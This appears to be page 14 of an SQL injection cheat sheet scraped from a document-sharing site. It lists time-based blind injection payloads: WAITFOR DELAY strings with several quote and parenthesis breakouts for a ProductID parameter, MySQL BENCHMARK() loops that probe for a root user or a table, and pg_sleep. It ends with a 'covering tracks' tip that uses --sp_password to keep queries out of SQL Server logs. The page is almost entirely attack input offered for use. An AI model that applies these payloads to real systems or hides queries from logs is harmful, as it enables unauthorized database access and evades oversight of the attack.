Sql Injection Cheat Sheet Page 14
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18This is just like sleep, wait for spesified time. CPU safe way to make database wait.
WAITFOR DELAY '0:0:10'--
Also you can use fractions like this,
WAITFOR DELAY '0:0:0.51'
Real World Samples
•
Are we 'sa' ?
if (select user) = 'sa' waitfor delay '0:0:10'
•
ProductID =
1;waitfor delay '0:0:10'--
•
ProductID =
1);waitfor delay '0:0:10'--
•
ProductID =
1';waitfor delay '0:0:10'--
•
ProductID =
1');waitfor delay '0:0:10'--
•
ProductID =
1));waitfor delay '0:0:10'--
•
ProductID =
1'));waitfor delay '0:0:10'--
BENCHMARK() (M)
Basically we are abusing this command to make MySQL wait a bit. Be careful you will
consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)
Real World Samples
•
Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root')
BENCHMARK(1000000000,MD5(1))
•
Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
pg_sleep(seconds) (P)
Sleep for supplied seconds.
•
SELECT pg_sleep(10);
Sleep 10 seconds.
Covering Tracks
SQL Server -sp_password log bypass (S)
SQL Server don't log queries which includes sp_password for security reasons(!). So if
you add --sp_password to your queries it will not be in SQL Server logs (of course still
will be in web server logs, try to use POST if it's possible)
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education